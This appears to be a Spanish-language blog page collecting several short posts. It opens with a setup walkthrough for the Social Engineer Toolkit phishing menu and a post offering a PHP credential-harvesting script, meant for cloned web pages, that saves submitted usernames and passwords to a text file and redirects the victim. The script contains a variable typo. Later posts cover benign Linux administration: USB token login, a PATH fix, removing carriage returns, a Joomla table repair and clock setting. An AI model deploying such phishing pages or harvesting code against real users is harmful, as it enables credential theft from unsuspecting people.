Phishing + robo de contraseñas con SET (Social Engineer Toolkit)

SET (Social Engineer Toolkit), se trata de un kit de herramientas especialmente diseñado para realizar ataques avanzados contra el elemento humano. Este conjunto de herramientas rápidamente se ha constituido en una herramienta estandard en el arsenal de los penetration testers.

Fué escrito por David Kennedy (Rel1K). Los ataques construidos con este toolkit son diseñados para ser lanzado contra una persona u organización durante un test de penetración. Forma parte del kit de herramientas de Backtrack.

Configuración:

pentest/exploits/SET#nano config/set_config

Nos fijamos que estén configuradas, al menos, las siguientes opciones:

METASPLOIT_PATH=/opt/metasploit3/msf3
ETTERCAP=ON
ETTERCAP_INTERFACE=eth0
ETTERCAP_PATH=/usr/share/ettercap
WEBATTACK_EMAIL=ON
AUTO_DETECT=ON
SELF_SIGNED_APPLET=ON

Ahora, ejecutamos SET:

pentest/exploits/SET# ./set

Se presenta el siguiente menú:

Select from the menu:

1.  Spear-Phishing Attack Vectors
2.  Website Attack Vectors
3.  Infectious Media Generator
4.  Create a Payload and Listener
5.  Mass Mailer Attack
6.  Teensy USB HID Attack Vector
7.  SMS Spoofing Attack Vector
8.  Third Party Modules
9.  Update the Metasploit Framework
10. Update the Social-Engineer Toolkit
11. Help, Credits, and About
12. Exit the Social-Engineer Toolkit

Escojemos la opción: 2

Sigue leyendo

Anuncios

Formulario sencillo para Phishing…

El phishing, conocido ataque de la fase de Gathering Information, en el que se le presenta a un usuario una página falsa para que haga el ingreso de sus datos, y sin su conocimiento estos datos son transferidos/enviados al atacante.

En este post, se hace mención a este tipo de ataque de una forma básica. Y se plantea el siguiente escenario:

Una vez seleccionada la página objetivo/victima a “falsear”, se hace una copia exacta de la misma, pero la misma incluye un formulario en php que toma los datos ingresados y los almacena en un archivo .txt. Una vez realizado esto, subir la página a un servidor web local (dentro de la red), para que sea enviado a los usuarios dentro de la red.

Archivos necesarios:

Lo que necesitamos por ahora es el código php que será el encargado de leer los datos ingresados y enviarlos a un .txt. Abrimos cualquier editor de texto y pegamos el siguiente código y le damos cualquier nombre, por ejemplo validar.php

<?php
$fichero = “infousers.txt”;
$handle = fopen($fichero, “a+”);
foreach($_POST as $user => $pass)
{
fwrite($handle, $user);
fwrite($handle, “=”);
fwrite($handle, $vpass);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);

header(“Location: http://www.google.com&#8221;);

exit;
?>

Básicamente, lo que hacemos en este código es:

Sigue leyendo

Autenticación en un equipo GNU/Linux usando USB como token

Para autenticarnos en un equipo GNU/Linux, a más de la contraseña del usuario, también puedes utilizar tu USB como token, como medida adicional para proteger el ingreso a tu equipo Linux o bien utilizar ambas medidas, de una manera sencilla y económica:
El Linux utilizado es Backtrack 4 r2, y una memoria USB común y corriente.

Paquetes necesarios a instalar:

Mediante consola podemos instalar los siguientes paquetes:

#apt-get install libpam-usb pamusb-tools

Ahora, debemos conectar nuestra memoria USB y la agregamos de la siguiente forma:

#pamusb-conf –add-device token
Añadir dispositivo USB
Añadir dispositivo USB

Se nos muestra un resumen del dispositivo agregado, que será utilizada como token.
El siguiente paso es agregar el usuario al token del a siguiente manera:

#pamusb-conf –add-user tuusuario

Finalmente se modifica el archivo /etc/pam.d/common-auth, añadiendo la siguiente entrada al archivo:

auth sufficient pam_usb.so

si se quiere utilizar la USB para la autenticación

o

auth required pam_usb.so

si se quiere utilizar ambas medidas para la autenticación, es decir, el ingreso al sistema a través del password del usuario y conjuntamente con la memoria USB montada.

Tomado de: http://www.rinconinformatico.net/usando-una-memoria-usb-como-token-para-autenticarnos-en-una-maquina-gnulinux

not included in the PATH environment variable

Despues de reiniciar un equipo con Ubuntu 7.10 Server,  y querer ejecutar algun comando, se me presentaba el siguiente error:

Por ejemplo al hacer ls, salia esto:

Command 'ls' is available in '/bin/ls'
The command could not be located because '/usr/bin' is not included in the PATH environment variable.

El problema al parecer es un arranque defectuoso del sistema y no se cargan correctamente la configuración.

La solución es setear la variable PATH, con el siguiente comando:

export PATH=/usr/bin:/bin

Luego ya se podrá ejecutar los comandos normalmente.

Fuente:

http://ubuntuforums.org/showthread.php?t=1442849

Eliminar caracter ^M de Windows en archivos Linux

A muchos les haya pasado (como en mi caso) que al intentar ejecutar un archivo en Linux, se muestra un error que no permite tal ejecución.

Me he descargado un código fuente, escrito en perl, lo copie en un .txt. Luego lo renombre a tal archivo con extensión .pl y lo copié en una máquina con Linux, Centos, dandole tambien los permisos de ejecución necesarios.

Al momento de ejecutar este script escrito en perl, me da el error que no se puede ejecutar debido a que exite un caracter windows “^M” en tal script. Esto se produce porque al copiar un archivo de windows a linux se copia igual estos caracteres:

Existen alguna soluciones, la más sencilla (a mi parecer) y la que a mi me ha servido es ejecutar el siguiente comando:

cat fichero | tr -d '\r' > nuevoFichero

Donde tal caracter se elimina.

Es too….

Fuente:

http://aitoreus.blogspot.com/2010/03/eliminar-caracteres-de-windows-en-linux.html

Error 1033 Mysql

Tengo un servidor con Ubuntu 7.10 Server como Sistema Operativo en el cual he instaldo Joomla, como contenedor de páginas web.

En la instalación no hubo ningún problema, solo que a las 3 semanas, realmente por andar meneando el servidor, al intentar lanzar el servidor en la url, me aparecía el siguiente error:

jtablesession::Store Failed
DB function failed with error number 1033
Incorrect key file for table ‘jos_session’; try to repair it SQL=INSERT INTO `jos_session` ( `session_id`,`time`,`username`,`gid`,`guest`,`client_id` ) VALUES ( ‘234769a8321e4b31301f9d751fcdad32′,’1276109684′,”,’0′,’1′,’0’ )
Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 35 bytes) in /…./…./libraries/joomla/error/exception.php on line 117

La falla es en la base de datos, puntualmente con la tabla “jos_session” (en mi caso) de mi base de datos para Joomla, la cual se daña y no permite poder visualizar la página joomla del servidor Web.

Luego de andar googleando… La solución que encontré para este caso es: eliminar la tabla jos_session, crearla nuevamente, reiniciar apache2 y solucionado… (otra vez, al menos en mi caso)

Esto lo podemos ejecutar a través de phpMyAdmin como gestor de la base de datos Mysql, donde ejecutamos la sentencia SQL.

La siguiente es la sentencia SQL para poder realizar lo antes mencionado:

DROP TABLE IF EXISTS `jos_session`;
 CREATE TABLE `jos_session` (
 `username` varchar(150) default '',
 `time` varchar(14) default '',
 `session_id` varchar(200) NOT NULL default '0',
 `guest` tinyint(4) default '1',
 `userid` int(11) default '0',
 `usertype` varchar(50) default '',
 `gid` tinyint(3) unsigned NOT NULL default '0',
 `client_id` tinyint(3) unsigned NOT NULL default '0',
 `data` longtext,
 PRIMARY KEY  (`session_id`(64)),
 KEY `whosonline` (`guest`,`usertype`),
 KEY `userid` (`userid`),
 KEY `time` (`time`)
 ) ENGINE=MyISAM DEFAULT CHARSET=utf8;

Luego de ejecutar esto, en nuestro servidor web reiniciamos apache2 y así podremos visualizar nuevamente nuestra página Web de Joomla.

Salu2

Comandos para configurar la hora y fecha del sistema – Linux

Aunque esto es un paso sencillo, es muy útil y necesario al momento de configurar servidores en Linux:

La forma correcta, a mi parecer, es primero configurar la hora del bios y luego sincronizar la hora del sistema con la del bios. Esto se realiza para que la configuración de la hora siga siendo la misma si se reinicia el equipo:

Para poder combiar la hora de la bios ejecutamos el comando hwclock en una terminal linux:

Sintaxis:

hwclock –set –date=”año-mes-dia hora:min:seg”

Asi:

# hwclock --set --date="2000-02-25 16:25"

Ahora, para sincronizar la hora del sistema con la hora del bios, ejecutamos el siguiente comando:

# hwclock --hctosys

Para poder comprobar el funcionamiento, ejecutamos el comando date o hwclock:

# date

# hwclock

Si se reinicia el equipo, se tomará la fecha y hora de la BIOS….

Fuentes:

http://bulma.net/body.phtml?nIdNoticia=950

http://blogofsysadmins.com/ajuste-de-los-relojes-de-sistema-y-bios-en-linux